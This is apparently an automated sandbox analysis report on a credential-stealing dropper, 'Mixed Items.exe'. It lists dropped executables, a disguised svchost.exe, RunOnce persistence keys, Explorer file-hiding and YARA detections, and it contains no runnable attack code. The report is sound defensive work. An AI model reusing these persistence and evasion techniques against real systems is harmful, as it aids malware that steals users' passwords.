                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: C:\Users\user\Desktop\Mixed Items.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: Mixed Items.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                        Source: Mixed Items.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000007.00000002.268206463.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp
                        Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: hawkgoods.exe
                        Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: hawkgoods.exe

                        Data Obfuscation:

                        barindex
                        Binary contains a suspicious time stampShow sources
                        Source: initial sampleStatic PE information: 0xEA799C72 [Sat Aug 28 12:54:10 2094 UTC]
                        Yara detected Beds ObfuscatorShow sources
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00375939 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00378BE1 push es; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00375CF0 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00378DE1 push es; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00378E21 push eax; mov dword ptr [esp], ecx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B5960 push ebp; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B5948 push esp; ret
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B3B38 pushfd ; retn 0036h
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003B3B08 push esp; retn 0036h
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E25870 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E26028 push eax; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00E28FC1 push eax; mov dword ptr [esp], ecx
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00530712 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00530712 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_0050BA9D push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_0050BA9D push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00D1A0F7 push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00D1A083 push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_00D1A16B push cs; retf
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_07700773 push 69EBC360h; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_0770064F push 69EBC310h; ret
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_0770089F push 69EBC3B0h; ret

                        Persistence and Installation Behavior:

                        barindex
                        Drops PE files with benign system namesShow sources
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeJump to dropped file
                        Drops executables to the windows directory (C:\Windows) and starts themShow sources
                        Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\Purchase Order.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\origigoods40.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\origigoods20.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\hawkgoods.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeJump to dropped file

                        Boot Survival:

                        barindex
                        Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                        Source: C:\Users\user\Desktop\Mixed Items.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmrJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                        Source: C:\Users\user\Desktop\Mixed Items.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmrJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmrJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmrJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tvQKHpPrzFBMmrJump to behavior

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Changes the view of files in windows explorer (hidden files and folders)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
